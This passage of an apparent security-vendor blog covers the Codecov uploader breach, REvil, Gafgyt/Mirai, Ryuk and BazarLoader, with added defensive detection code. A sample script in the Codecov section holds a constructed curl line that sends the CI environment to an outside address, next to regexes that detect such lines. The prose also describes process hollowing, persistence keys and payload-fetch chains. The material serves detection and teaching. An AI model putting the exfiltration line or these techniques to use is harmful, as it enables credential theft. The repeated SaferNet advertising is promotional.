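    for client, f in find_bot_api_clients(SAMPLE_LOG, {"10.0.5.21"}).items():
        print(client, f["hits"], sorted(f["methods"]), sorted(f["tokens"]))
```

Without TLS inspection a proxy or DNS log only shows the host name, so the `hits` count still works but the token and method sets stay empty; a repeating `getUpdates` poll followed by `sendDocument` is the command-and-exfiltration rhythm to look for when the path is visible.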

SaferNet is the perfect solution to the cybersecurity issues that individuals, families, and businesses face today. It not only connects every device using a secure, 24/7 always on, military grade VPN, but it also stops outside cyberthreats, malware and viruses as well. On SaferNet, all users are protected anywhere in the world, all the time, on any cellular or Wi-Fi network. In addition to SaferNet’s VPN and cyber protection, it also offers a range of employee or parental/family internet controls including internet filtering, monitoring, scheduling, and blocking access to websites or even entire website categories.

Typically, a business or family would need 3 separate services for a VPN, Malware Protection, and Internet Controls; SaferNet offers all 3 features in one service. SaferNet truly is an endpoint security presence that can be implemented in minutes around the world, on phones, laptops, tablets, and computers at an economical price point that caters to all sizes of businesses and families. SaferNet guarantees a smooth setup and installation process that takes only minutes, and an easily accessible control hub for you to monitor all your employees’ or family members’ devices, including activity, time spent online, and threats blocked.

Hackers Breach Codecov supply-chain, Exposing Hundreds of Networks

Hackers have breached the popular code-coverage platform Codecov, modifying its Bash Uploader script and exposing sensitive information from customers’ continuous integration (CI) environments. The attack went unnoticed for some time: Codecov discovered the breach on April 1, but the unauthorized access began on January 31. Codecov provides tools that measure how much of the source code executes during testing, a process known as code coverage, which indicates how much code could be hiding undetected bugs. It has a customer base of more than 29,000 enterprises, including Alibaba, Amazon, Atlassian, the Washington Post, GoDaddy, Royal Bank of Canada, and Procter & Gamble.

The Bash Uploader script is used by Codecov customers to send coverage reports to Codecov’s servers: it detects CI-specific settings, collects the reports, and uploads them.

The attackers targeted this data, modifying the script so that the environment collected during a CI run was also sent to a server outside Codecov’s infrastructure. Based on what the script could collect, Codecov announced that the threat actors could be in possession of any of the following:

  • Any credentials, tokens, or keys that our customers were passing through their CI runner that would be accessible when the Bash Uploader script was executed
  • Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys
  • The git remote information (URL of the origin repository) of repositories using the Bash Uploaders to upload coverage to Codecov in CI

Because of this potential risk, affected users are strongly recommended to re-roll all credentials, tokens, or keys present in the environment variables in the CI processes that relied on Bash Uploader.

Customers using a local copy of the script should check whether the attackers’ addition at line 525 of the script is present. If the code shown below is there, they should replace their copy with Codecov’s latest version of the script.

Offending code, from BleepingComputer‘s report
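Two offline checks for a locally vendored copy of an upload script, added here as an example; this is not Codecov’s own tooling, and the sample script is a constructed stand-in rather than the real Bash Uploader. The first check pins the script to a known-good SHA-256 so a drifted copy is refused before it runs; the second scans it for a line that hands the CI environment (`$(env)`, backtick `env`, or `env |`) to an outbound HTTP client, which is the combination that exported secrets in the tampered uploader. The regexes, the pinned digest and the 198.51.100.10 address (a documentation range) are assumptions.

```python
"""Added example (not Codecov's tooling): offline checks for a vendored CI
upload script. The sample script, the pinned digest and the regexes are
constructed; the sample is not the real Codecov script."""
import hashlib
import hmac
import re

# Constructed stand-in for a vendored uploader. Line 7 mimics the kind of
# addition the article describes: the git remote plus the whole environment
# posted to a third-party host (documentation address, not a real server).
SAMPLE_SCRIPT = """\
#!/usr/bin/env bash
set -e
url="https://codecov.example/upload/v4"
# legitimate upload of the coverage report
curl -X POST --data-binary @coverage.txt "$url?package=bash&token=$CODECOV_TOKEN"
# line an attacker appended
curl -s -d "$(git remote -v) $(env)" http://198.51.100.10/collect
"""

HTTP_CLIENT = re.compile(r"\b(curl|wget)\b")
ENV_DUMP = re.compile(
    r"\$\((env|printenv)\)"              # $(env) / $(printenv)
    r"|`(env|printenv)`"                 # backtick form
    r"|(^|[;&|]\s*)(env|printenv)\s*\|"  # env | curl ...
)


def sha256_hex(text):
    return hashlib.sha256(text.encode()).hexdigest()


def verify_pinned(text, expected_sha256):
    """True only if the script body matches the pinned digest."""
    return hmac.compare_digest(sha256_hex(text), expected_sha256)


def find_env_exfil_lines(text):
    """Return [(line_no, line)] for lines that both dump the environment and
    invoke an HTTP client; the combination is the exfiltration signature."""
    return [(no, line) for no, line in enumerate(text.splitlines(), 1)
            if HTTP_CLIENT.search(line) and ENV_DUMP.search(line)]


def safe_to_run(text, expected_sha256):
    """Gate to call before executing a vendored script: the digest must match
    the pinned copy and no exfiltration line may be present."""
    return verify_pinned(text, expected_sha256) and not find_env_exfil_lines(text)


if __name__ == "__main__":
    pinned = sha256_hex(SAMPLE_SCRIPT)      # in practice: the digest you recorded
    for no, line in find_env_exfil_lines(SAMPLE_SCRIPT):
        print(f"line {no}: {line}")
    print("safe to run:", safe_to_run(SAMPLE_SCRIPT, pinned))
```

The digest check is the one that actually closes the hole: a `curl | bash` of a script fetched at build time has no pin at all, so record the digest of the version you reviewed and compare before every run. The regex scan is a secondary signal for triage of copies you did not pin.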

Regarding the attack, Codecov said, “Based upon the forensic investigation results to date, it appears that there was periodic, unauthorized access to a Google Cloud Storage (GCS) key beginning January 31, 2021, which allowed a malicious third-party to alter a version of our bash uploader script to potentially export information subject to continuous integration (CI) to a third-party server. Codecov secured and remediated the script April 1, 2021.”

Immediately after learning of the compromise, the company took steps to mitigate the incident, which included the following:

  • rotating all relevant internal credentials, including the key used to facilitate the modification of the Bash Uploader
  • auditing where and how the key was accessible
  • setting up monitoring and auditing tools to ensure that this kind of unintended change cannot occur to the Bash Uploader again
  • working with the hosting provider of the third-party server to ensure the malicious webserver was properly decommissioned

Hackers Draw Attention of US Federal Investigators

By mid-April, the scale of the attack had grown enough to draw the attention of US federal investigators, and comparisons were made to last year’s SolarWinds breach. Codecov has around 29,000 customers, making the attack potentially catastrophic.

According to federal investigators, Codecov hackers deployed automation to use the collected customer credentials to tap into hundreds of client networks, thereby expanding the scope of this system breach beyond just Codecov’s systems.

Codecov’s git, showing Amazon and Alibaba interactions

“The hackers put extra effort into using Codecov to get inside other makers of software development programs, as well as companies that themselves provide many customers with technology services, including IBM,” a federal investigator anonymously told Reuters.

By abusing the customer credentials collected via the Bash Uploader script, hackers could potentially gain credentials for thousands of other restricted systems, according to the investigator.

Some Codecov customers such as IBM stated they have not been breached by the hackers, but have declined to comment further.

An Atlassian spokesperson said, “We are aware of the claims and we are investigating them. At this moment, we have not found any evidence that we have been impacted nor have identified signs of a compromise.”

Hewlett Packard Enterprise said its investigation was continuing: “HPE has a dedicated team of professionals investigating this matter, and customers should rest assured we will keep them informed of any impacts and necessary remedies as soon as we know more.”

The Federal Bureau of Investigation and the U.S. Department of Homeland Security have not commented on the investigation at this time.

The Codecov breach is yet another supply-chain attack. In the last 12 months, such attacks have become increasingly common, allowing hackers to breach a multitude of enterprises through a single weak link.

Protection

With many supply-chain attacks occurring, it is important that businesses and families have the best possible tools to keep themselves protected. One of these tools is SaferNet.


Apple Likely To Meet REvil Ransomware Demands As Gang Escalates Global Attacks

The gang behind the REvil ransomware strain (also known as Sodinokibi or Sodin) continued its global attacks into 2021 by demanding that Apple pay a $50 million ransom by May 1st. After Apple initially declined, the ransomware gang put the squeeze on the tech giant, leaking details of new products just hours before one of Apple’s product unveilings.

The original attack was launched against Quanta Computer, a Global Fortune 500 electronics manufacturer that counts Apple among its customers. The Taiwan-based company assembles Apple products, including the Apple Watch and the MacBook Air and Pro, from Apple-provided design schematics, and also builds Lenovo’s ThinkPad line.

The REvil gang breached Quanta’s servers, stole files, and held them to ransom. According to a statement posted on the criminals’ dark web site, which they call the “Happy Blog”, Quanta refused to pay, so the hackers began threatening the company’s customers and leaked a set of blueprints for some products to turn up the pressure, adding that more would be leaked every day the ransom went unpaid.

REvil began leaking the stolen files just hours before Apple’s Spring Loaded event on Tuesday, including schematics for some of the new iMacs debuted there.

“In order not to wait for the upcoming Apple presentations, today we, the REvil group, will provide data on the upcoming releases of the company so beloved by many,” according to REvil’s blog post, the report said. “Tim Cook can say thank you Quanta. From our side, a lot of time has been devoted to solving this problem.”

The REvil gang has demanded a $50 million ransom by May 1st. The group is not known for leniency: in the past it has been strict about deadlines.

“The REvil ransomware gang doesn’t make false promises,” said Ivan Pittaluga, CTO of enterprise security firm ArcServe. “They’re notoriously known for leaking data if their demands aren’t met.”

REvil are believed to have made at least $100 Million in 2020, and 2021 looks like it will strengthen their finances even more.

REvil Ransomware Analysis

REvil deployments were first observed in 2019, when attackers leveraged a deserialization vulnerability in Oracle WebLogic servers tracked as CVE-2019-2725. The ransomware is highly configurable and can be customized to behave differently depending on the host, which makes it an attractive RaaS offering. Some of its features include:

  • Exploits a kernel privilege escalation vulnerability, CVE-2018-8453, to gain SYSTEM privileges.
  • Whitelists files, folders and extensions so they are excluded from encryption.
  • Kills specific processes and services prior to encryption.
  • Encrypts files on local and network storage.
  • Customizes the name and body of the ransom note and the contents of the desktop background image.
  • Exfiltrates encrypted information about the infected host to remote controllers.
  • Communicates with its controllers over HTTPS.

REvil was first advertised on Russian-language cybercrime forums. The main actor associated with advertising and promoting REvil ransomware is called Unknown aka UNKN. The RaaS is operated as an affiliate service, where affiliates spread the malware by acquiring victims and the REvil operators maintain the malware and payment infrastructure. Affiliates receive 60% to 70% of the ransom payment.

Unknown has acknowledged that the ransomware is based on the now-retired GandCrab ransomware: “We used to be affiliates of the GandCrab affiliate program. We bought the source code and started our own business. We developed custom features for our purposes.”

REvil exploits a kernel privilege escalation vulnerability in win32k.sys, tracked as CVE-2018-8453, to gain SYSTEM privileges on the infected host. If the configuration instructs a sample to execute this exploit, it allocates executable memory, decrypts the exploit code into the newly allocated region and invokes it.

Protection

REvil and other Ransomware clients are some of the most common and deadly cybersecurity threats out there today. Families and businesses should be aware of these threats, and equip the right tools to tackle them. One of these tools is SaferNet.


Gafgyt Botnet Absorbs Code From Notorious Mirai Strain

The Gafgyt botnet, known for attacks using IoT devices, has absorbed code from the Mirai botnet. Mirai likewise builds its arsenal from IoT devices, and its source code has been public for several years. Researchers have discovered updated Gafgyt variants using several functions lifted straight from Mirai, allowing Gafgyt to compromise Huawei, Realtek, and Dasan GPON devices. The botnet was already known to target devices from ASUS and other large IoT manufacturers, and it often uses known vulnerabilities such as CVE-2017-17215 and CVE-2018-10561 to download next-stage payloads to infected devices.

The latest variants have incorporated several Mirai-based modules, according to research from Uptycs released last Thursday, along with new exploits. Mirai variants, and other botnets re-using Mirai modules, have become more common since the source code was released in 2016.

The capabilities taken from Mirai include several methods of carrying out DDoS attacks:

HTTP flooding is a DDoS technique in which the attacker sends a large number of HTTP requests to the targeted server to overwhelm it. The creators of Gafgyt re-used this code from the leaked Mirai source.

Comparison between Gafgyt and Mirai’s HTTP Flooding Module

UDP flooding is a DDoS technique in which the attacker sends a high volume of UDP packets to the victim server to exhaust it. Gafgyt contains the same UDP flooding functionality, copied from the leaked Mirai source code.

Comparison between Gafgyt and Mirai’s UDP Flooding Module

TCP flood module – Gafgyt performs all types of TCP flood attacks, such as SYN, PSH and FIN floods. These attacks abuse the normal three-way TCP handshake: the victim server receives a heavy number of connection requests and becomes unresponsive. The image below shows Gafgyt’s TCP flooder module, which contains code similar to Mirai’s.

Comparison between Gafgyt and Mirai’s TCP Flooding Module

STD module – Gafgyt contains an STD module which sends a random string (from a hardcoded array of strings) to a target IP address. Mirai has the same functionality.

Comparison between Gafgyt and Mirai’s STD Flooding Module

Brute force module – flooding modules are not the only ones re-used. Recent Gafgyt samples also contain other modules with small tweaks, such as a Telnet brute-force scanner.

Comparison between Gafgyt and Mirai’s telnet bruteforce scanner
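The flood and brute-force modules above are easier to reason about from the defender’s side, so here is an added example (not Uptycs’ research code and not Gafgyt or Mirai code) that detects the three patterns over flow records: a SYN flood as many SYN-only flows at one destination inside a one-second window, a UDP flood as a high packet total between one source/destination pair, and the Telnet brute forcer as many new TCP/23 connections from one source inside a minute. The flow record shape, the thresholds and the sample traffic (documentation addresses only) are assumptions made for this example.

```python
"""Added example (not Uptycs', Gafgyt's or Mirai's code): sliding-window
detection of SYN floods, UDP floods and Telnet brute forcing over constructed
flow records. Record shape, thresholds and sample traffic are assumptions."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: float      # seconds since capture start
    src: str
    dst: str
    proto: str     # "tcp" or "udp"
    dport: int
    flags: str     # TCP flags seen on the flow, e.g. "S", "SA", "PA"; "" for UDP
    packets: int


def _burst_totals(events, window, threshold):
    """events: {key: [(ts, weight)]}. For each key find the largest weighted
    total inside any `window`-second span; return {key: total} for keys whose
    total reaches `threshold`."""
    hits = {}
    for key, items in events.items():
        items.sort()
        lo, run, best = 0, 0, 0
        for hi, (t, w) in enumerate(items):
            run += w
            while t - items[lo][0] > window:   # slide the left edge forward
                run -= items[lo][1]
                lo += 1
            best = max(best, run)
        if best >= threshold:
            hits[key] = best
    return hits


def _syn_only(f):
    return f.proto == "tcp" and "S" in f.flags and "A" not in f.flags


def detect_syn_flood(flows, window=1.0, threshold=50):
    """Destinations that received >= threshold SYN-only flows in one window."""
    syns = defaultdict(list)
    for f in flows:
        if _syn_only(f):
            syns[f.dst].append((f.ts, 1))
    return _burst_totals(syns, window, threshold)


def detect_udp_flood(flows, window=1.0, threshold=2000):
    """(src, dst) pairs that exchanged >= threshold UDP packets in one window."""
    udp = defaultdict(list)
    for f in flows:
        if f.proto == "udp":
            udp[(f.src, f.dst)].append((f.ts, f.packets))
    return _burst_totals(udp, window, threshold)


def detect_telnet_bruteforce(flows, window=60.0, threshold=10):
    """Sources that opened >= threshold new Telnet connections in one window."""
    telnet = defaultdict(list)
    for f in flows:
        if _syn_only(f) and f.dport == 23:
            telnet[f.src].append((f.ts, 1))
    return _burst_totals(telnet, window, threshold)


def build_sample_flows():
    """Constructed traffic: a benign web session and DNS lookup, then the three
    attack patterns. All addresses are from the documentation ranges."""
    flows = [
        Flow(0.00, "192.0.2.10", "203.0.113.5", "tcp", 443, "S", 1),
        Flow(0.01, "192.0.2.10", "203.0.113.5", "tcp", 443, "A", 1),
        Flow(0.02, "192.0.2.10", "203.0.113.5", "tcp", 443, "PA", 12),
        Flow(0.50, "192.0.2.10", "10.0.0.53", "udp", 53, "", 2),
    ]
    # SYN flood: 120 SYN-only flows from 120 spoofed sources inside 0.5 s
    flows += [Flow(5.0 + i * 0.004, f"198.51.100.{i + 1}", "203.0.113.5",
                   "tcp", 80, "S", 1) for i in range(120)]
    # UDP flood: 40 flows of 100 packets each from one bot inside 0.8 s
    flows += [Flow(20.0 + i * 0.02, "198.51.100.7", "203.0.113.5",
                   "udp", 53, "", 100) for i in range(40)]
    # Telnet brute force: 15 connection attempts to one device over 28 s
    flows += [Flow(100.0 + i * 2.0, "192.0.2.9", "10.0.0.23",
                   "tcp", 23, "S", 1) for i in range(15)]
    return flows


if __name__ == "__main__":
    sample = build_sample_flows()
    print("SYN flood targets :", detect_syn_flood(sample))
    print("UDP flood pairs   :", detect_udp_flood(sample))
    print("Telnet brute force:", detect_telnet_bruteforce(sample))
```

The SYN detector keys on destination because flood sources are spoofed, while the Telnet detector keys on source because a brute forcer has to complete handshakes from a real address; the thresholds are starting points to tune against a baseline of the monitored segment.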

Meanwhile, the latest versions of Gafgyt contain new approaches for achieving initial compromise of IoT devices, Uptycs found; this is the first step in turning infected devices into bots to later perform DDoS attacks on specifically targeted IP addresses. These include a Mirai-copied module for Telnet brute-forcing, and additional exploits for existing vulnerabilities in Huawei, Realtek and GPON devices.

Gafgyt uses the Huawei exploit (CVE-2017-17215) and the Realtek exploit (CVE-2014-8361) for remote code execution (RCE), which is then used to fetch the Gafgyt payload.

“The Gafgyt malware binary embeds RCE exploits for Huawei and Realtek routers, by which the malware binary, using ‘wget’ command, fetches the payload,” according to Uptycs. “[It] gives the execution permission to payload using ‘chmod’ command, [and] executes the payload.”

The GPON exploit (CVE-2018-10561) is used for authentication bypass in vulnerable Dasan GPON routers; here, the malware binary follows the same process, but can also remove the payload on command.

“The IP addresses used for fetching the payloads were generally the open directories where malicious payloads for different architectures were hosted by the attacker,” researchers added.

Before Gafgyt Botnet: The Storied History of Mirai

The Mirai Botnet has been around for several years. While other malware may go into periods of slow activity, Mirai has remained at the forefront of botnet headlines since its inception.

Perhaps Mirai’s most infamous attack came on October 12, 2016. On that date, a massive distributed denial-of-service (DDoS) attack left much of the internet inaccessible on the U.S. east coast. The attack, which authorities initially feared was the work of a hostile nation-state, was in fact the work of the Mirai botnet.

This attack, which initially had much less grand ambitions, grew more powerful than its creators ever dreamed possible. The botnet’s origins were speculated about for some time, with many believing it to be the work of high-profile cybercriminals. Instead, Mirai was created by three friends who used the botnet to run an extortion ring against Minecraft servers, a video game they played together.

It encapsulated some clever techniques, including the list of hardcoded passwords. But, in the words of an FBI agent who investigated the attacks, “These kids are super smart, but they didn’t do anything high level—they just had a good idea.”

Far more damaging than developing the botnet itself, the creators released the source code publicly in 2016. This has led to a wildfire of Mirai-related attacks, and researchers estimate there are currently more than 60 variants of the botnet.

Mirai has a few key characteristics seen across all variations of it:

  • Mirai can launch both HTTP flood and network-level attacks
  • There are certain IP address ranges that Mirai is hard-wired to avoid, including those owned by GE, Hewlett-Packard, and the U.S. Department of Defense
  • Upon infecting a device, Mirai looks for other malware on that device and wipes it out, in order to claim the gadget as its own
  • Mirai’s code contains a few Russian-language strings. This was intended to be a red-herring on its origin, but still remains in variations

Protection

With evolving botnet tools like Gafgyt posing new threats every day, it’s important to use the tools required to protect your devices. One of these tools is SaferNet.


Ryuk Ransomware Gets Updated Attack Vector Options

Recent attacks from the gang behind the Ryuk ransomware show that it has been updated with a new attack vector for gaining initial access to a victim’s network. According to BleepingComputer, “The trend observed in attacks this year reveals a predilection towards targeting hosts with remote desktop connections exposed on the public internet.” Phishing emails, the gang’s original vector, remain in use.

Security researchers from the threat intelligence boutique Advanced Intelligence (AdvIntel) observed that Ryuk ransomware attacks this year relied more often on compromising exposed RDP connections to gain an initial foothold on a target network.

The actors have been running “large-scale brute force and password spraying attacks against exposed RDP hosts” to compromise user credentials.

Another attack vector used by the gang recently has been the spear-phishing BazarCall campaign. This campaign saw the attackers distribute malware through malicious call centers that targeted corporate users and directed them to weaponized Excel documents. SaferNet covered that campaign in a recent post.

AdvIntel noted that the 2021 attacks have relied more on scanning for exposed RDP hosts than on phishing.

Researchers stated that the Ryuk gang undertook reconnaissance in two stages. One was to determine what kind of valuable resources are on the compromised domain. The second stage is to find information about the company’s finances, in order to set an appropriate ransom fee for the ransomware.

While enumerating Active Directory, the Ryuk operators use AdFind, an AD query tool, and the post-exploitation tool BloodHound, which maps relationships in an Active Directory domain to find attack paths.

Ryuk Ransomware RDP Breach Courtesy of AdvIntel

Getting financial details about the victim relies on open-source data. AdvIntel says that the actors search on services like ZoomInfo for information about the company’s recent mergers and acquisitions and other details that can increase the profitability of the attack.

Additional reconnaissance is carried out using the Cobalt Strike post-exploitation tool that’s become a standard in most ransomware operations and scans that reveal the security products like antivirus and endpoint detection response (EDR) defending the network.

Another new technique used by the Ryuk gang was KeeThief, an open-source tool for extracting credentials from the KeePass password manager.

KeeThief works by extracting key material (e.g. master password, key file) from the memory of a running KeePass process with an unlocked database.

Vitali Kremez, the CEO of AdvIntel, told BleepingComputer that the attackers used KeeThief to bypass EDR and other defenses by stealing the credentials of a local IT administrator with access to EDR software.

Another tactic was to deploy a portable version of Notepad++ to run PowerShell scripts on systems with PowerShell execution restriction, Kremez says.

According to researchers, Ryuk attacks in 2021 are making use of exploits for two vulnerabilities, both of which have patches available. These are:

CVE-2018-8453 – high-severity (7.8/10) privilege escalation in Windows 7 through 10 and Windows Server 2008 through 2016 that allows an attacker to run arbitrary code in kernel mode, because the Win32k component fails to properly handle objects in memory.

CVE-2019-1069 – high-severity (7.8/10) privilege escalation in Windows 10, Windows Server 2016 and 2019, caused by the way the Task Scheduler Service validates certain file operations, which enables a hard-link attack.

“Once actors have successfully compromised a local or domain admin account, they distribute the Ryuk payload through Group Policy Objects, PsExec sessions from a domain controller, or by utilizing a startup item in the SYSVOL share”, AdvIntel said.

According to the company, organisations should take the following mitigation steps:

  • Detect the use of Mimikatz and the execution of PsExec on the network
  • Alert on the presence of AdFind, BloodHound, and LaZagne on the network
  • Ensure that operating systems and software have the latest security patches
  • Implement multi-factor authentication for RDP access
  • Network segmentation and controls to check SMB and NTLM traffic
  • Use the principle of least privilege and routinely review account permissions to prevent privilege creep
  • Routinely review Group Policy Objects and logon scripts
  • Patch systems against CVE-2018-8453 and CVE-2019-1069

Ryuk is the most notorious ransomware client on the web today and has collected over $150 million in ransom payments. Changing tactics is a sign of an ever-evolving threat.

Protection

When cyberthreats grow every day, it’s important business owners use updated tools to combat the dangers their businesses face. One of these tools is SaferNet.


BazarLoader Malware Targets Slack and Basecamp

The BazarLoader Malware is engaging in a campaign that targets users of work collaboration tools Slack and Basecamp. The attack utilizes email messages with links to malware payloads. Slack is a popular tool used for communication amongst teams, particularly those who work remotely. Basecamp focuses on project management but also allows for team communication. Similar to Slack, Basecamp is popular amongst remote workers. Both tools are used even in office environments.

We have reported at length on BazarLoader at SaferNet, most recently last week, when the malware was being distributed as a part of the BazarCall campaign. This campaign took a novel route by using call centers for social engineering.

BazarLoader’s purpose is, in effect, to act as a malware loader. It tends to distribute TrickBot, IcedID, Gozi IFSB, and other malware, and notably has also been distributing the Ryuk ransomware. These infections are hazardous because they give threat actors remote access to compromised corporate networks, from which they spread laterally to steal data or deploy ransomware.

“With a focus on targets in large enterprises, BazarLoader could potentially be used to mount a subsequent ransomware attack,” according to an advisory from Sophos, issued on Thursday.

According to researchers at Sophos, in the first campaign spotted, adversaries are targeting employees of large organizations with emails that purport to offer important information related to contracts, customer service, invoices or payroll.

“One spam sample even attempted to disguise itself as a notification that the employee had been laid off from their job,” according to Sophos.

The links in the malicious emails are hosted on Slack or Basecamp. This means that if the target uses either service, the link could appear legitimate. Given how popular these platforms and remote working have grown, this is likely.

“The attackers prominently displayed the URL pointing to one of these well-known legitimate websites in the body of the document, lending it a veneer of credibility,” researchers said. “The URL might then be further obfuscated through the use of a URL shortening service, to make it less obvious the link points to a file with an .EXE extension.”

If the victim clicks the link, the BazarLoader executable is downloaded to the machine and run. When executed, it injects a DLL payload into a legitimate process, such as the Windows command shell, cmd[.][exe].

“The malware, only running in memory, cannot be detected by an endpoint protection tool’s scans of the filesystem, as it never gets written to the filesystem,” explained researchers. “The files themselves don’t even use a legitimate .DLL file suffix because Windows doesn’t seem to care that they have one; The OS runs the files regardless.”

It is believed that BazarLoader is connected to Trickbot, in that the creators of each are possibly one and the same. TrickBot is another first-stage loader malware often used in ransomware campaigns.

Sophos looked into the connection and found that the two malwares use some of the same infrastructure for command and control.

“From what we could tell, the [BazarLoader] malware binaries running in the lab network bear no resemblance to TrickBot,” according to the posting. “But they did communicate with an IP address that has been used in common, historically, by both malware families. Of course, a lot of people have studied this connection in the past.”

In any event, BazarLoader appears to be in an early stage of development and isn’t as sophisticated as more mature families like TrickBot, researchers added.

For instance, “while early versions of the malware were not obfuscated, more recent samples appear to encrypt the strings that might reveal the malware’s intended use,” they said.

BazarLoader Malware Analysis

BazarLoader has been analysed in depth by researchers at AT&T Cybersecurity.

The BazarLoader authors have produced an advanced module, with a significant amount of obfuscation. The BazarLoader uses multiple routines to hide API calls and embedded strings, which are then decrypted and resolved at runtime.

Once executed, the loader will allocate memory to store and decrypt its shellcode, which will be allocated to a NUMA node for faster execution. After allocation and decryption, the next instructions will jump to the shellcode that will be executed on the heap.

Next, the malware will try to communicate with its C2 servers on .bazar domains. Once C2 communication has been established, the loader will try to inject its payload into a system process using the process hollowing technique (T1093): it creates a suspended thread, unmaps the destination image from memory, allocates new memory in the target process, copies the shellcode into the target process, sets the thread context, and resumes the process.

The loader will first attempt to inject into an “svchost” process; if injection fails, it will try the “explorer[.][exe]” process, and if injection fails again, as a last-ditch effort the loader will attempt to inject into the “cmd[.][exe]” process. For persistence the loader will create a registry key under “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit”.

The malware uses the Windows API function “VirtualAllocExNuma” to allocate the memory in which its shellcode is executed. “VirtualAllocExNuma” allocates memory on a specific NUMA node, which allows for faster execution. The implementation can be seen in Figure 1 below. It is interesting to note that “VirtualAllocExNuma” is not commonly used in process injection.

API Resolution and Shellcode Decryption Routines

The BazarLoader authors have created dozens of decryption routines: almost every string, including API names, DLL names, and C2 addresses, has its own single-use decryption routine. The loader uses the same decryption technique described above to resolve the API calls it uses during execution.

For injection, the malware resolves APIs from ntdll.dll after loading it from disk, and checks that none of those functions carry inline hooks, such as the hooks AV software places to track those API calls.

The load order of APIs called in the injection procedure is:

  • CreateProcessA (CREATE_SUSPENDED | CREATE_NEW_CONSOLE)
  • NtGetContextThread
  • NtReadVirtualMemory
  • NtUnmapViewOfSection
  • VirtualAllocExA
  • NtWriteVirtualMemory
  • NtSetContextThread
  • NtResumeThread
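As an added example (not from the AT&T write-up), the following detection logic scans a constructed, sandbox-style API-call trace for the ordered sequence just listed: a process created with CREATE_SUSPENDED followed by unmap, write, set-context and resume from the same caller, with the unusual VirtualAllocExNuma call noted when present. The trace format, PIDs and image names are assumptions for the example.

```python
import re
from collections import defaultdict
# Constructed sandbox-style API trace (hypothetical format:
# "<caller_pid> <api> target=<pid> [flags=...]"), not real BazarLoader output.
SAMPLE_TRACE = """\
4100 CreateProcessA target=4212 flags=CREATE_SUSPENDED|CREATE_NEW_CONSOLE image=svchost.exe
4100 NtGetContextThread target=4212
4100 NtReadVirtualMemory target=4212
4100 NtUnmapViewOfSection target=4212
4100 VirtualAllocExNuma target=4212
4100 NtWriteVirtualMemory target=4212
4100 NtSetContextThread target=4212
4100 NtResumeThread target=4212
5000 CreateProcessA target=5010 flags=CREATE_NEW_CONSOLE image=notepad.exe
5000 NtResumeThread target=5010
6000 CreateProcessA target=6020 flags=CREATE_SUSPENDED image=app.exe
6000 NtResumeThread target=6020
"""
# The ordered hollowing steps from the load order listed above; a suspended
# process that is merely resumed (e.g. by a debugger) must not match.
HOLLOW_SEQUENCE = ["NtUnmapViewOfSection", "NtWriteVirtualMemory",
                   "NtSetContextThread", "NtResumeThread"]
LINE_RE = re.compile(r"^(\d+)\s+(\w+)\s+target=(\d+)(?:\s+flags=(\S+))?")

def find_hollowing(trace):
    """Return [(caller_pid, target_pid, notes)] for each target created with
    CREATE_SUSPENDED that then saw HOLLOW_SEQUENCE in order from that caller."""
    calls = defaultdict(list)   # (caller, target) -> APIs in trace order
    suspended, numa = set(), set()
    for line in trace.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        caller, api, target, flags = m.groups()
        key = (int(caller), int(target))
        calls[key].append(api)
        if api == "CreateProcessA" and flags and "CREATE_SUSPENDED" in flags:
            suspended.add(key)
        if api == "VirtualAllocExNuma":   # rarely seen in benign injection
            numa.add(key)
    hits = []
    for key in suspended:
        it = iter(calls[key])   # ordered subsequence check; extra calls allowed
        if all(step in it for step in HOLLOW_SEQUENCE):
            notes = ["suspended create followed by unmap/write/setctx/resume"]
            if key in numa:
                notes.append("VirtualAllocExNuma used for the injected region")
            hits.append((key[0], key[1], notes))
    return sorted(hits)
```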

The obfuscated C2 servers are decrypted in the function shown below:

C2 domains: forgame[.]bazar and bestgame[.]bazar

Protection

Education is also the key to defense against attacks like these. Outwitting social engineering attempts is the only guaranteed way not to fall victim to campaigns like BazarLoader. For times when a dupe may be unclear, it’s important to have the tools necessary to back you up. One of these tools is SaferNet.

SaferNet is the perfect solution to the cybersecurity issues that individuals, families, and businesses face today. It not only connects every device using a secure, 24/7 always-on, military-grade VPN, but it also stops outside cyberthreats, malware and viruses as well. On SaferNet, all users are protected anywhere in the world, all the time, on any cellular or Wi-Fi network. In addition to SaferNet’s VPN and cyber protection, it also offers a range of employee or parental/family internet controls including internet filtering, monitoring, scheduling, and blocking access to websites or even entire website categories.

Typically, a business or family would need 3 separate services for a VPN, Malware Protection, and Internet Controls; SaferNet offers all 3 features in one service. SaferNet truly is an endpoint security presence that can be implemented in minutes around the world, on phones, laptops, tablets, and computers at an economical price point that caters to all sizes of businesses and families. SaferNet guarantees a smooth setup and installation process that takes only minutes, and an easily accessible control hub for you to monitor all your employees’ or family members’ devices, including activity, time spent online, and threats blocked.

NSA Warns Of 5 Security Exploits Being Used By Russia

United States government security agencies, including the NSA, have released a joint advisory warning citizens of the most threatening security exploits being used by the Russian Foreign Intelligence Service (SVR). The SVR’s cyber department has previously been nicknamed Cozy Bear, APT29, and The Dukes by the various cybersecurity researchers who have tracked it over the years. Unsurprisingly, Cozy Bear is associated with a staggering number of cyberattacks in the last five years; most notably, the SolarWinds attack last year, which the US officially pinned on the group this month.

In the report, the agencies outline that SVR/Cozy Bear “frequently use publicly known vulnerabilities to conduct widespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access. This targeting and exploitation encompasses U.S. and allied networks, including national security and government-related systems.”

As well as SolarWinds, SVR/Cozy Bear has been behind a number of attacks in the last 12 months. These include targeting COVID-19 research facilities through deploying WellMess malware and leveraging a VMware vulnerability that was a zero-day at the time for follow-on Security Assertion Markup Language (SAML) authentication abuse. SVR cyber actors also used authentication abuse tactics following SolarWinds-based breaches.

The SVR/Cozy Bear has exploited, and continues to successfully exploit, software vulnerabilities to gain initial footholds in victim devices and networks. As outlined in the report, the 5 most notable exploits are as follows:

CVE-2018-13379 – This exploit concerns Fortinet. In Fortinet Secure Sockets Layer (SSL) Virtual Private Network (VPN) web portals, an Improper Limitation of a Pathname to a Restricted Directory (“Path Traversal”) allows an unauthenticated attacker to download system files via specially crafted HTTP resource requests. Threat actors have extensively used this vulnerability in the past to target government agencies and corporate networks, including U.S. government election support systems and COVID-19 research organizations, and more recently to deploy the Cring ransomware. In November 2020, a threat actor leaked the credentials for almost 50,000 Fortinet VPN devices on a hacker forum.

